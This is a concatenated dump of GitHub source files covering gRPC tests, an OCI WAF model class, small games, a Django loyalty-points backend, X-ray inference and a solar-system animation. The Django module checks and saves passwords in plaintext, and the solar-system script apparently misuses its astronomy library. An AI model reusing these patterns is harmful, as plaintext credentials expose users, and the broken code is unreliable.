(labels==preds_vec).sum()/num_samples\n print(feat_id, acc)\n # if feat_id==50:\n # break\n\n","repo_name":"piyush01123/viola-jones-face","sub_path":"src/classifier_utils.py","file_name":"classifier_utils.py","file_ext":"py","file_size_in_byte":4445,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"12597497335","text":"import unittest\n\nimport logging\nimport grpc\nfrom grpc import _grpcio_metadata\n\nfrom tests.unit import test_common\nfrom tests.unit.framework.common import test_constants\n\n_UNARY_UNARY = '/test/UnaryUnary'\n_STREAM_STREAM = '/test/StreamStream'\n\n\ndef handle_unary(request, servicer_context):\n servicer_context.send_initial_metadata([('grpc-internal-encoding-request',\n 'gzip')])\n return request\n\n\ndef handle_stream(request_iterator, servicer_context):\n # TODO(issue:#6891) We should be able to remove this loop,\n # and replace with return; yield\n servicer_context.send_initial_metadata([('grpc-internal-encoding-request',\n 'gzip')])\n for request in request_iterator:\n yield request\n\n\nclass _MethodHandler(grpc.RpcMethodHandler):\n\n def __init__(self, request_streaming, response_streaming):\n self.request_streaming = request_streaming\n self.response_streaming = response_streaming\n self.request_deserializer = None\n self.response_serializer = None\n self.unary_unary = None\n self.unary_stream = None\n self.stream_unary = None\n self.stream_stream = None\n if self.request_streaming and self.response_streaming:\n self.stream_stream = handle_stream\n elif not self.request_streaming and not self.response_streaming:\n self.unary_unary = handle_unary\n\n\nclass _GenericHandler(grpc.GenericRpcHandler):\n\n def service(self, handler_call_details):\n if handler_call_details.method == _UNARY_UNARY:\n return _MethodHandler(False, False)\n elif handler_call_details.method == _STREAM_STREAM:\n return _MethodHandler(True, True)\n else:\n return None\n\n\nclass CompressionTest(unittest.TestCase):\n\n def setUp(self):\n self._server = test_common.test_server()\n self._server.add_generic_rpc_handlers((_GenericHandler(),))\n self._port = self._server.add_insecure_port('[::]:0')\n self._server.start()\n\n def tearDown(self):\n self._server.stop(None)\n\n def testUnary(self):\n request = b'\\x00' * 100\n\n # Client -> server compressed through default client channel compression\n # settings. Server -> client compressed via server-side metadata setting.\n # TODO(https://github.com/grpc/grpc/issues/4078): replace the \"1\" integer\n # literal with proper use of the public API.\n compressed_channel = grpc.insecure_channel(\n 'localhost:%d' % self._port,\n options=[('grpc.default_compression_algorithm', 1)])\n multi_callable = compressed_channel.unary_unary(_UNARY_UNARY)\n response = multi_callable(request)\n self.assertEqual(request, response)\n\n # Client -> server compressed through client metadata setting. Server ->\n # client compressed via server-side metadata setting.\n # TODO(https://github.com/grpc/grpc/issues/4078): replace the \"0\" integer\n # literal with proper use of the public API.\n uncompressed_channel = grpc.insecure_channel(\n 'localhost:%d' % self._port,\n options=[('grpc.default_compression_algorithm', 0)])\n multi_callable = compressed_channel.unary_unary(_UNARY_UNARY)\n response = multi_callable(\n request, metadata=[('grpc-internal-encoding-request', 'gzip')])\n self.assertEqual(request, response)\n compressed_channel.close()\n\n def testStreaming(self):\n request = b'\\x00' * 100\n\n # TODO(https://github.com/grpc/grpc/issues/4078): replace the \"1\" integer\n # literal with proper use of the public API.\n compressed_channel = grpc.insecure_channel(\n 'localhost:%d' % self._port,\n options=[('grpc.default_compression_algorithm', 1)])\n multi_callable = compressed_channel.stream_stream(_STREAM_STREAM)\n call = multi_callable(iter([request] * test_constants.STREAM_LENGTH))\n for response in call:\n self.assertEqual(request, response)\n compressed_channel.close()\n\n\nif __name__ == '__main__':\n logging.basicConfig()\n unittest.main(verbosity=2)\n","repo_name":"kiwibrowser/src","sub_path":"third_party/grpc/src/src/python/grpcio_tests/tests/unit/_compression_test.py","file_name":"_compression_test.py","file_ext":"py","file_size_in_byte":4199,"program_lang":"python","lang":"en","doc_type":"code","stars":2475,"dataset":"github-code","pt":"52"} +{"seq_id":"31606070119","text":"from oci.util import formatted_flat_dict, NONE_SENTINEL, value_allowed_none_or_none_sentinel # noqa: F401\nfrom oci.decorators import init_model_state_from_kwargs\n\n\n@init_model_state_from_kwargs\nclass ProtectionRuleExclusion(object):\n \"\"\"\n Allows specified types of requests to bypass the protection rule. If a request matches any of the criteria in the `exclusions` field, the protection rule will not be executed. Rules can have more than one exclusion and exclusions are applied to requests disjunctively, meaning the specified exclusion strings are independently matched against the specified targets of a request. The first target to match a specified string will trigger an exclusion. **Example:** If the following exclusions are defined for a protection rule:\n\n \\\"action\\\": \\\"BLOCK\\\",\n \\\"exclusions\\\": [\n {\n \\\"target\\\":\\\"REQUEST_COOKIES\\\",\n \\\"exclusions\\\":[\\\"example.com\\\", \\\"12345\\\", \\\"219ffwef9w0f\\\"]\n },\n {\n \\\"target\\\":\\\"REQUEST_COOKIE_NAMES\\\",\n \\\"exclusions\\\":[\\\"OAMAuthnCookie\\\", \\\"JSESSIONID\\\", \\\"HCM-PSJSESSIONID\\\"]\n }\n ],\n \\\"key\\\": \\\"1000000\\\",\n\n A request with the cookie name `sessionid` would trigger an exclusion. A request with the cookie name `yourcompany.com` would *not* trigger and exclusion.\n \"\"\"\n\n #: A constant which can be used with the target property of a ProtectionRuleExclusion.\n #: This constant has a value of \"REQUEST_COOKIES\"\n TARGET_REQUEST_COOKIES = \"REQUEST_COOKIES\"\n\n #: A constant which can be used with the target property of a ProtectionRuleExclusion.\n #: This constant has a value of \"REQUEST_COOKIE_NAMES\"\n TARGET_REQUEST_COOKIE_NAMES = \"REQUEST_COOKIE_NAMES\"\n\n #: A constant which can be used with the target property of a ProtectionRuleExclusion.\n #: This constant has a value of \"ARGS\"\n TARGET_ARGS = \"ARGS\"\n\n #: A constant which can be used with the target property of a ProtectionRuleExclusion.\n #: This constant has a value of \"ARGS_NAMES\"\n TARGET_ARGS_NAMES = \"ARGS_NAMES\"\n\n def __init__(self, **kwargs):\n \"\"\"\n Initializes a new ProtectionRuleExclusion object with values from keyword arguments.\n The following keyword arguments are supported (corresponding to the getters/setters of this class):\n\n :param target:\n The value to assign to the target property of this ProtectionRuleExclusion.\n Allowed values for this property are: \"REQUEST_COOKIES\", \"REQUEST_COOKIE_NAMES\", \"ARGS\", \"ARGS_NAMES\", 'UNKNOWN_ENUM_VALUE'.\n Any unrecognized values returned by a service will be mapped to 'UNKNOWN_ENUM_VALUE'.\n :type target: str\n\n :param exclusions:\n The value to assign to the exclusions property of this ProtectionRuleExclusion.\n :type exclusions: list[str]\n\n \"\"\"\n self.swagger_types = {\n 'target': 'str',\n 'exclusions': 'list[str]'\n }\n\n self.attribute_map = {\n 'target': 'target',\n 'exclusions': 'exclusions'\n }\n\n self._target = None\n self._exclusions = None\n\n @property\n def target(self):\n \"\"\"\n Gets the target of this ProtectionRuleExclusion.\n The target of the exclusion.\n\n Allowed values for this property are: \"REQUEST_COOKIES\", \"REQUEST_COOKIE_NAMES\", \"ARGS\", \"ARGS_NAMES\", 'UNKNOWN_ENUM_VALUE'.\n Any unrecognized values returned by a service will be mapped to 'UNKNOWN_ENUM_VALUE'.\n\n\n :return: The target of this ProtectionRuleExclusion.\n :rtype: str\n \"\"\"\n return self._target\n\n @target.setter\n def target(self, target):\n \"\"\"\n Sets the target of this ProtectionRuleExclusion.\n The target of the exclusion.\n\n\n :param target: The target of this ProtectionRuleExclusion.\n :type: str\n \"\"\"\n allowed_values = [\"REQUEST_COOKIES\", \"REQUEST_COOKIE_NAMES\", \"ARGS\", \"ARGS_NAMES\"]\n if not value_allowed_none_or_none_sentinel(target, allowed_values):\n target = 'UNKNOWN_ENUM_VALUE'\n self._target = target\n\n @property\n def exclusions(self):\n \"\"\"\n Gets the exclusions of this ProtectionRuleExclusion.\n\n :return: The exclusions of this ProtectionRuleExclusion.\n :rtype: list[str]\n \"\"\"\n return self._exclusions\n\n @exclusions.setter\n def exclusions(self, exclusions):\n \"\"\"\n Sets the exclusions of this ProtectionRuleExclusion.\n\n :param exclusions: The exclusions of this ProtectionRuleExclusion.\n :type: list[str]\n \"\"\"\n self._exclusions = exclusions\n\n def __repr__(self):\n return formatted_flat_dict(self)\n\n def __eq__(self, other):\n if other is None:\n return False\n\n return self.__dict__ == other.__dict__\n\n def __ne__(self, other):\n return not self == other\n","repo_name":"oracle/oci-python-sdk","sub_path":"src/oci/waas/models/protection_rule_exclusion.py","file_name":"protection_rule_exclusion.py","file_ext":"py","file_size_in_byte":4864,"program_lang":"python","lang":"en","doc_type":"code","stars":345,"dataset":"github-code","pt":"52"} +{"seq_id":"44073886644","text":"from turtle import Turtle\n\n\nFONT = (\"Courier\", 24, \"normal\")\n\n\nclass Scoreboard(Turtle):\n\tdef __init__(self):\n\t\tsuper().__init__()\n\t\tself.color(\"black\")\n\t\tself.penup()\n\t\tself.hideturtle()\n\t\tself.goto(-280, 250)\n\t\tself.level = 1\n\t\tself.update_scoreboard()\n\n\n\tdef increase_level(self):\n\t\tself.level += 1\n\t\tself.update_scoreboard()\n\n\n\tdef update_scoreboard(self):\n\t\tself.clear()\n\t\ttext = f\"Level: {self.level}\"\n\t\tself.write(arg=text, align=\"left\", font=FONT)\n\n\n\tdef game_over(self):\n\t\ttext = \"GAME OVER\"\n\t\tself.goto(0, 0)\n\t\tself.write(arg=text, align=\"center\", font=FONT)","repo_name":"tiagoserique/100-days-of-code-in-python","sub_path":"023-day/turtle_crossing/scoreboard.py","file_name":"scoreboard.py","file_ext":"py","file_size_in_byte":568,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"30097900281","text":"from api.models import *\nfrom datetime import datetime, date, time, timedelta\nfrom django.conf import settings\nfrom django.utils.timezone import make_aware\nfrom random import random\nfrom hashlib import sha1\nimport struct\n\ndef login(email, password):\n try:\n u = Client.objects.get(email=email, password=password)\n return u\n except Client.DoesNotExist:\n pass\n try:\n u = Store.objects.get(email=email, password=password)\n return u\n except Store.DoesNotExist:\n return None\n\ndef getStore(store_id):\n try:\n s = Store.objects.get(id=store_id)\n except Store.DoesNotExist:\n return None\n\n return s.getJson()\n\ndef getAllStores():\n return {'stores':[store.getJson() for store in Store.objects.all()]}\n\ndef getAllCategories():\n return {'categories':[category.getJson() for category in Category.objects.all()]}\n\ndef getFidelityPoints(client_id,store_id):\n try:\n return FidelityPoints.objects.get(client=client_id,store=store_id).points\n except FidelityPoints.DoesNotExist:\n return 0\n\ndef getAllFidelityPoints(client_id):\n return {'points':[{'store':x.store.getJson(),'points':x.points} for x in list(FidelityPoints.objects.filter(client=client_id))]}\n\n\ndef getStoreProducts(store_id):\n try:\n s = Store.objects.get(id=store_id)\n except Store.DoesNotExist:\n return None\n\n return [product.getJson() for product in Product.objects.filter(store=s)]\n\n\ndef addProduct(pName,pDescription,pCategory,store_id,pPoints,pQuantity):\n try:\n store = Store.objects.get(id=store_id)\n c = Category.objects.get(name=pCategory)\n p = Product.objects.create(name=pName,description=pDescription,category=c,store=store,points=pPoints,quantity=pQuantity)\n p.save()\n except:\n return None\n\n return p\n\n\ndef updateProduct(product_id,pName,pDescription,pCategory,store_id,pPoints,pQuantity):\n try:\n p = Product.objects.get(id=product_id)\n except Product.DoesNotExist:\n return None\n\n if(p.store.id == store_id):\n p.name = pName\n p.description = pDescription\n try:\n c = Category.objects.get(name=pCategory)\n except Category.DoesNotExist:\n return None\n p.category = c\n p.points = pPoints\n p.quantity = pQuantity\n\n p.save()\n else:\n return None\n\n return p\n\n\ndef removeProduct(product_id,store_id):\n try:\n p = Product.objects.get(id=product_id)\n except Product.DoesNotExist:\n return None\n\n if(p.store.id == store_id):\n return p.delete()\n else:\n return None\n\n\ndef creditClient(store_id,client_hash):\n try:\n s = Store.objects.get(id=store_id)\n except Store.DoesNotExist:\n return 'storeNotFound'\n\n settings.TIME_ZONE\n creditTime = make_aware(datetime.now())\n\n clientList = Client.objects.filter(hash=client_hash, generatedOn__gte=(creditTime-timedelta(minutes=10)))\n if not clientList:\n print(\"no client found or qr code expired\")\n return 'qrcode'\n else:\n c = clientList[0]\n print(c)\n\n fp, created = FidelityPoints.objects.get_or_create(store=s,client=c)\n\n today_min = make_aware(datetime.combine(date.today(), time.min))\n print(today_min)\n today_max = make_aware(datetime.combine(date.today(), time.max))\n print(today_max)\n\n print(fp.lastTimeCredited)\n if((fp.lastTimeCredited is not None) and (fp.lastTimeCredited>=today_min and fp.lastTimeCredited<=today_max)):\n print(\"already credited today\")\n return 'fraud'\n else:\n fp.points += s.givenPoints\n fp.lastTimeCredited = make_aware(datetime.now())\n fp.save()\n c.hash = None\n c.save()\n return 'success'\n\n\ndef debitClient(store_id,transaction):\n try:\n s = Store.objects.get(id=store_id)\n print(s)\n except Store.DoesNotExist:\n print(\"no store found\")\n return None\n\n client_hash = transaction['client_hash']\n\n settings.TIME_ZONE\n debitTime = make_aware(datetime.now())\n\n clientList = Client.objects.filter(hash=client_hash, generatedOn__gte=(debitTime-timedelta(minutes=10)))\n if not clientList:\n print(\"no client found or qr code expired\")\n return None\n else:\n c = clientList[0]\n print(c)\n\n products = transaction['products']\n\n\n transactionPoints = 0\n for p in products:\n pId = p['id']\n pQuantity = p['quantity']\n\n product = Product.objects.get(id=pId)\n\n transactionPoints += (product.points * pQuantity)\n\n print(transactionPoints)\n\n try:\n fp = FidelityPoints.objects.get(store=s,client=c)\n print(fp)\n except:\n print(\"fp not found\")\n return None\n\n if(transactionPoints <= fp.points):\n #validatedOn = datetime.now()\n settings.TIME_ZONE\n validatedOn = make_aware(datetime.now())\n\n try:\n t = Transaction.objects.create(client=c, store=s, validatedOn=validatedOn)\n except:\n print(\"couldn't create transaction\")\n return None\n\n try:\n for p in products:\n pId = p['id']\n pQuantity = p['quantity']\n\n product = Product.objects.get(id=pId)\n print(product)\n \n tp = TransactionProduct.objects.create(transaction=t, name=product.name, description=product.description, category=product.category.name, points=product.points, quantity=pQuantity)\n print(tp)\n \n product.quantity -= pQuantity\n if(product.quantity < 0):\n print('not enough products')\n return None\n\n tp.save()\n product.save()\n\n except:\n print(\"couldn't create transactionProducts\")\n t.delete()\n return None\n\n fp.points -= transactionPoints\n c.hash = None\n\n fp.save()\n c.save()\n t.save()\n\n else:\n print(\"not enough points\")\n return None\n\n return t\n\n\ndef generateQRCode(client_id):\n try:\n client = Client.objects.get(id=client_id)\n except Store.DoesNotExist:\n return None\n\n return client.generateQRCode()\n\ndef getPointsForClient(store_id,hash):\n\n try:\n client = Client.objects.get(hash=hash)\n except Client.DoesNotExist:\n return None\n try:\n return FidelityPoints.objects.get(client=client.id,store=store_id).points\n except FidelityPoints.DoesNotExist:\n return 0\n return points.points\n\ndef getAllProductModels():\n return {'modelProducts':[prod.getJson() for prod in ProductModel.objects.all()]}\n\ndef getPurchaseRecords(client_id):\n #return {'Records': [{'store':x.store.getJson(),'validatedOn':x.validatedOn,'products':[{'product':y.getJson(),'quantity':TransactionProduct.objects.get(transaction=x.id,product=y.id).quantity} for y in x.products.all()]} for x in Transaction.objects.filter(client=client_id)]}\n '''\n tList = Transaction.objects.filter(client=client_id)\n for t in tList:\n tpList = TransactionProduct.objects.filter(transaction=t)\n '''\n\n return {'Records': [{'store':t.store.getJson(),'validatedOn':t.validatedOn,'products':[{'product':tp.getJson()} for tp in TransactionProduct.objects.filter(transaction=t)]} for t in Transaction.objects.filter(client=client_id)]}\n\n\ndef updateClientInfo(client_id,firstname,lastname,password, email):\n client = Client.objects.get(id=client_id)\n client.email=email\n client.lastname=lastname\n client.firstname=firstname\n client.password=password\n client.save()\n return client\n\ndef updateStoreInfo(store_id,givenPoints,saleStart,saleEnd):\n store = Store.objects.get(id=store_id)\n store.givenPoints=givenPoints\n store.saleStart=saleStart\n store.saleEnd=saleEnd\n store.save()\n return store\n","repo_name":"lorettet/Smart","sub_path":"api/services.py","file_name":"services.py","file_ext":"py","file_size_in_byte":7930,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"52"} +{"seq_id":"34520400155","text":"from vector import Vector\nimport math\n\nv1_x = (-3, 0, 5, 9)\nv1_y = (-5, 0, 7, 9)\n\nv2_x = (-15, 0, 34, 9)\nv2_y = (-6, 0, 2, 9)\n\nv1_list = list()\nv2_list = list()\n\nfor x1 in v1_x:\n for y1 in v1_y:\n v1_list.append(Vector(x1, y1))\n\nfor x2 in v2_x:\n for y2 in v2_y:\n v2_list.append(Vector(x2, y2))\n\n\ndef compare(v, v_before):\n x_eq = v.x() == v_before.x()\n y_eq = v.y() == v_before.y()\n return x_eq and y_eq\n\n\ndef test_add():\n for v1 in v1_list:\n for v2 in v2_list:\n v1_before = Vector(v1.x(), v1.y())\n v2_before = Vector(v2.x(), v2.y())\n v3 = v1 + v2\n assert v3.x() == v1.x() + v2.x()\n assert v3.y() == v1.y() + v2.y()\n assert compare(v1, v1_before) is True\n assert compare(v2, v2_before) is True\n\n\ndef test_eq():\n for v1 in v1_list:\n for v2 in v2_list:\n x_eq = v1.x() == v2.x()\n y_eq = v1.y() == v2.y()\n v_eq = v1 == v2\n assert v_eq == (x_eq and y_eq)\n\n\ndef test_neq():\n for v1 in v1_list:\n for v2 in v2_list:\n x_neq = v1.x() != v2.x()\n y_neq = v1.y() != v2.y()\n v_neq = v1 != v2\n assert v_neq == (x_neq or y_neq)\n\n\ndef test_mul_num():\n for v in v1_list:\n for num in v2_x:\n x_mul_num = v.x() * num\n y_mul_num = v.y() * num\n assert x_mul_num == (v * num).x()\n assert y_mul_num == (v * num).y()\n\n\ndef test_mul_vec():\n for v1 in v1_list:\n for v2 in v2_list:\n res_vec = Vector(v1.x() * v2.x(), v1.y() * v2.y())\n assert (v1 * v2).x() == res_vec.x()\n assert (v1 * v2).y() == res_vec.y()\n assert v1 * v2.x() == Vector(v1.x() * v2.x(), v1.y() * v2.x())\n assert v2.x() * v1 == Vector(v1.x() * v2.x(), v1.y() * v2.x())\n\n\ndef test_length():\n for v in v1_list:\n length = v.x() ** 2 + v.y() ** 2\n length = length ** 0.5\n assert math.isclose(v.length(), length)\n","repo_name":"patrikeevairina/hll_labs","sub_path":"lab_2/test_vector.py","file_name":"test_vector.py","file_ext":"py","file_size_in_byte":2012,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"39410252571","text":"\"\"\"\n ----------------------------------------\n CXR-Lung-Risk - data processing\n ----------------------------------------\n\"\"\"\n\nimport sys\nimport argparse\nimport subprocess\n\nimport warnings\nwarnings.simplefilter(action = 'ignore')\n\nimport math\nimport time\nimport pretrainedmodels\n\nimport pandas as pd\n\nfrom docopt import docopt\nfrom sklearn.metrics import *\n\nimport torch\nimport torch.nn as nn\nimport torch.nn.functional as F\n\nimport SimpleArchs\n\nimport fastai\nfrom fastai.vision.all import *\n\n\ndef run_cxr_lung_risk(config):\n\n \"\"\"\n Run the CXR-Lung-Risk processing pipeline. Before running this script, the user must ensure that the model weights are\n downloaded and found in the right folder (\"/path/to/repo/models\" for the ensemble, and ~/.cache/torch/hub/checkpoints\n for the InceptionV4 checkpoint - see README.md for additional instructions).\n\n Furthermore, the user must ensure any piece of data to be processed was correctly preprocessed (and converted to .png).\n\n Arguments:\n config : required - dictionary storing the arguments parsed from the configuration file \"config.yaml\".\n \n Outputs:\n This function runs the CXR-Lung-Risk pipeline, and outputs the results in a CSV file stored at the specified location (config.yaml).\n \"\"\"\n \n ensemble_weights_fn = config[\"ensemble_weights_fn\"]\n model_details_fn = config[\"model_details_fn\"]\n mdl_dir = config[\"mdl_dir\"]\n mdl_name = config[\"mdl_name\"]\n\n use_gpu = config[\"use_gpu\"]\n gpu_id = config[\"gpu_id\"]\n\n test_set_dir = config[\"test_set_dir\"]\n test_dataset_name = config[\"test_dataset_name\"]\n\n out_file_path = config[\"out_file_path\"]\n\n if use_gpu:\n os.environ[\"CUDA_VISIBLE_DEVICES\"] = gpu_id\n else:\n os.environ[\"CUDA_VISIBLE_DEVICES\"] = \"\"\n\n model_details_df = pd.read_csv(model_details_fn)\n ensemble_weights_df = pd.read_csv(ensemble_weights_fn)\n\n patients_list = [f for f in os.listdir(test_set_dir) if os.path.isfile(os.path.join(test_set_dir, f))] \n\n # The results of the inference phase are stored in the DataFrame \"results_df\"\n\n # Dummy is a dummy nonsense variable to act as the fake \"target variable\" - necessary for the pipeline to run\n # The column \"valid_col\" is True for all samples except for an artificial sample at the end\n # (since for the fast.ai learner to work, there needs to be a \"training set\" included too)\n output_df = pd.DataFrame(columns = ['File', 'Dummy', 'Prediction'])\n output_df['File'] = patients_list\n output_df['Dummy'] = np.random.random_sample(len(patients_list))\n output_df['valid_col'] = np.repeat(True, output_df.shape[0])\n\n # Add an additional image to act as the dummy training set, by setting the \"valid_col\" value to False\n results_df = output_df.append(output_df.iloc[output_df.shape[0] -1, :],\n ignore_index = True)\n\n results_df.loc[results_df.shape[0] -1, 'valid_col'] = False \n\n # The number of models in the ensemble corresponds to the number of rows in the \"model_details_df\" dataframe\n # In this specific case, the number of models should be 20\n model_number = model_details_df.shape[0]\n mbar = master_bar(range(model_number))\n\n print()\n\n # Create an empty array of num_images x 20 (20-models-ensemble)\n pred_arr = np.zeros((results_df.shape[0]-1, model_number))\n\n # run the inference loop for every model in the ensemble\n for model_id in mbar:\n out_nodes = int(model_details_df.Num_Classes[model_id])\n manual = False\n size = int(model_details_df.Image_Size[model_id])\n bs,val_bs = 4,4\n if(int(model_details_df.Normalize[model_id])==0):\n imgs = ImageDataLoaders.from_df(df = results_df, path = test_set_dir,\n label_col = \"Dummy\", y_block = RegressionBlock, bs = bs,\n val_bs = val_bs, valid_col = \"valid_col\",\n item_tfms = Resize(size), batch_tfms = None)\n else:\n imgs = ImageDataLoaders.from_df(df = results_df, path = test_set_dir,\n label_col = \"Dummy\", y_block = RegressionBlock, bs = bs,\n val_bs = val_bs, valid_col = \"valid_col\",\n item_tfms = Resize(size),\n batch_tfms = [Normalize.from_stats(*imagenet_stats)])\n\n # parse the model architecture from the \"model_details_fn\" file;\n # based on the model hyperparameters and details (stored in \"model_hyperparams_df\"),\n # initialise automatically a cnn learner object\n try:\n model_arch = model_details_df.Architecture[model_id].lower()\n \n # Cadene's pretrainedmodels InceptionV4 loading\n if(model_arch == \"inceptionv4\"):\n def get_model(pretrained = True, model_name = 'inceptionv4', **kwargs ): \n if pretrained:\n arch = pretrainedmodels.__dict__[model_name](num_classes = 1000, pretrained = 'imagenet')\n else:\n arch = pretrainedmodels.__dict__[model_name](num_classes = 1000, pretrained = None)\n return arch\n\n def get_cadene_model(pretrained=True, **kwargs ): \n return fastai_inceptionv4\n\n custom_head = create_head(nf = 2048*2, n_out = 37) \n fastai_inceptionv4 = nn.Sequential(*list(get_model(model_name = 'inceptionv4').children())[:-2], custom_head) \n \n elif(model_arch == \"resnet34\"):\n mdl = fastai.vision.models.resnet34\n \n elif(model_arch == \"tiny\"):\n manual = True\n mdl = SimpleArchs.get_simple_model(\"Tiny\", out_nodes)\n\n else:\n print(\"Architecture type: \" + model_arch + \" not supported. \" \\\n \"Please, make sure the `model_spec` CSV is found in the working directory and can be accessed.\")\n quit()\n\n if(model_arch == 'inceptionv4'):\n learn = cnn_learner(imgs, get_cadene_model,n_out = out_nodes)\n\n elif(manual):\n learn = Learner(imgs,mdl)\n\n else:\n learn = cnn_learner(imgs, mdl, n_out = out_nodes)\n\n except:\n print(\"Architecture not found for model #: \" + str(model_id))\n sys.exit(0)\n\n\n learn.path = Path(mdl_dir.split(\"models\")[0])\n learn.load(mdl_name + \"_\" + str(model_id))\n \n # run the inference phase\n preds, y = learn.get_preds(ds_idx = 1, reorder = False)\n\n # store the raw model predictions for all the subject in `test_set_dir`\n pred_arr[:, model_id] = np.array(preds[:, 0])\n\n\n # parse the LASSO ensemble weights from the CSV file shared with the repository\n ensemble_weights = ensemble_weights_df[\"weight\"].values\n\n # define the LASSO ensemble intercept computed on the tuning set\n lasso_intercept = 49.8484258\n\n # compute the final CXR-Lung-Risk by ensembling the scores\n predictions = np.matmul(pred_arr, ensemble_weights) + lasso_intercept\n\n output_df['CXR_Lung_Risk'] = predictions\n output_df = output_df.drop([\"valid_col\", \"Dummy\", \"Prediction\"], axis = 1)\n\n output_df.to_csv(out_file_path, index = False)\n\n# ----------------------------------------\n# ----------------------------------------\n\nif __name__ == \"__main__\":\n\n parser = argparse.ArgumentParser(description = 'Run the CXR-Lung-Risk inference pipeline.')\n\n parser.add_argument(\"--conf\",\n required = False,\n help = \"Specify the path to the YAML file containing details for the inference phase. \" \\\n \"Tries to default to 'config.yaml' under the 'src/' directory.\",\n default = \"config.yaml\")\n\n args = parser.parse_args()\n\n conf_file_path = os.path.join(args.conf)\n\n with open(conf_file_path) as f:\n yaml_conf = yaml.load(f, Loader = yaml.FullLoader)\n\n # dict storing the config args needed to run the main function\n config = dict()\n\n # path to the directory storing the test set\n _, test_dataset_name = os.path.split(yaml_conf[\"input\"][\"test_set_dir\"])\n config[\"test_set_dir\"] = yaml_conf[\"input\"][\"test_set_dir\"]\n config[\"test_dataset_name\"] = test_dataset_name\n\n # path to the directory storing the models\n config[\"mdl_dir\"] = \"../models\"\n\n # name of the CSV file storing the models details (e.g., architecture)\n config[\"model_details_fn\"] = \"CXR_Lung_Risk_Specs.csv\"\n \n # base name for the \".pth\" files of all the models in the ensemble\n config[\"mdl_name\"] = \"Lung_Age_081221\"\n\n # path to the directory where the output should be stored, and base file name for the output\n out_base_path = yaml_conf[\"output\"][\"out_base_path\"]\n\n if not os.path.exists(out_base_path):\n os.mkdir(out_base_path)\n\n out_fn = \"cxr_lung_risk_\" + test_dataset_name + \".csv\"\n\n config[\"out_file_path\"] = os.path.join(out_base_path, out_fn)\n\n # name of the CSV file storing the weights for the ensemble model\n config[\"ensemble_weights_fn\"] = \"ensemble_weights.csv\"\n\n # whether to use the GPU for the processing or not\n config[\"use_gpu\"] = yaml_conf[\"processing\"][\"use_gpu\"] \n config[\"gpu_id\"] = yaml_conf[\"processing\"][\"gpu_id\"] \n\n working_dir = os.getcwd()\n\n # check the script is running from the source code directory of the repository\n print(\"Current working directory:\", working_dir)\n \n assert(os.path.exists(config[\"mdl_dir\"]) and\n os.path.exists(config[\"model_details_fn\"]) and\n os.path.exists(config[\"test_set_dir\"]) and \n os.path.exists(config[\"ensemble_weights_fn\"])\n )\n\n assert(len(os.listdir(config[\"mdl_dir\"])) == 20 and\n len(os.listdir(config[\"test_set_dir\"])) > 0\n )\n\n print(\"Location to be parsed for images to process:\", config[\"test_set_dir\"])\n print(\"Location where the output should be saved at:\", config[\"out_file_path\"])\n\n run_cxr_lung_risk(config)\n\n ","repo_name":"AIM-Harvard/CXR-Lung-Risk","sub_path":"src/run_cxr_lung_risk.py","file_name":"run_cxr_lung_risk.py","file_ext":"py","file_size_in_byte":9634,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"52"} +{"seq_id":"13918332890","text":"import matplotlib.pyplot as plt\nfrom matplotlib.animation import FuncAnimation\nfrom poliastro.bodies import Sun, Mercury, Venus, Earth, Mars, Jupiter, Saturn, Uranus, Neptune\n\n# create objects for the sun and planets\nsun = Sun()\nmercury = Mercury()\nvenus = Venus()\nearth = Earth()\nmars = Mars()\njupiter = Jupiter()\nsaturn = Saturn()\nuranus = Uranus()\nneptune = Neptune()\n\n# create a figure and an axes for the plot\nfig, ax = plt.subplots()\n\n# set the title and axis labels of the plot\nax.set_title(\"Solar System\")\nax.set_xlabel(\"x (km)\")\nax.set_ylabel(\"y (km)\")\n\n# create lines for the sun and planets\nsun_line, = ax.plot([0], [0], \"o\", color=\"orange\")\nmercury_line, = ax.plot([], [], \"o\", color=\"gray\")\nvenus_line, = ax.plot([], [], \"o\", color=\"yellow\")\nearth_line, = ax.plot([], [], \"o\", color=\"blue\")\nmars_line, = ax.plot([], [], \"o\", color=\"red\")\njupiter_line, = ax.plot([], [], \"o\", color=\"brown\")\nsaturn_line, = ax.plot([], [], \"o\", color=\"gold\")\nuranus_line, = ax.plot([], [], \"o\", color=\"cyan\")\nneptune_line, = ax.plot([], [], \"o\", color=\"green\")\n\n# create a list of lines for the planets\nplanet_lines = [mercury_line, venus_line, earth_line, mars_line, jupiter_line, saturn_line, uranus_line, neptune_line]\n\n# create a function that updates the plot at each frame\ndef update_plot(frame):\n # calculate the positions of the sun and planets at the current frame\n sun_pos = sun.orbit.propagate(frame).r\n mercury_pos = mercury.orbit.propagate(frame).r\n venus_pos = venus.orbit.propagate(frame).r\n earth_pos = earth.orbit.propagate(frame).r\n mars_pos = mars.orbit.propagate(frame).r\n jupiter_pos = jupiter.orbit.propagate(frame).r\n saturn_pos = saturn.orbit.propagate(frame).r\n uranus_pos = uranus.orbit.propagate(frame).r\n neptune_pos = neptune.orbit.propagate(frame).r\n\n # update the lines with the new positions\n sun_line.set_data(sun_pos[0], sun_pos[1])\n mercury_line.set_data(mercury_pos[0], mercury_pos[1])\n venus_line.set_data(venus_pos[0], venus_pos[1])\n earth_line.set_data(earth_pos[0], earth_pos[1])\n mars_line.set_data(mars_pos[0], mars_pos[1])\n jupiter_line.set_data(jupiter_pos[0], jupiter_pos[1])\n saturn_line.set_data(saturn_pos[0], saturn_pos[1])\n uranus_line.set_data(uranus_pos[0], uranus_pos[1])\n neptune_line.set_data(neptune_pos[0], neptune_pos[1])\n\n # create an animation object using the update function\n\n\nanim = FuncAnimation(fig, update_plot, frames=365, interval=20)\n\n# display the animation\nplt.show()\n","repo_name":"anegian/Simulation_Net_Metering_Django","sub_path":"simulation/solarSystem.py","file_name":"solarSystem.py","file_ext":"py","file_size_in_byte":2496,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"52"} +{"seq_id":"5202595700","text":"#generator function (yield)\r\n'''\r\ndef abobora(b=0, maximum=10):\r\n while True:\r\n yield b\r\n b += 1\r\n if b >= maximum:\r\n break\r\n \r\n\r\ngen = abobora()\r\nfor i in gen:\r\n print(i) #não preciso usar 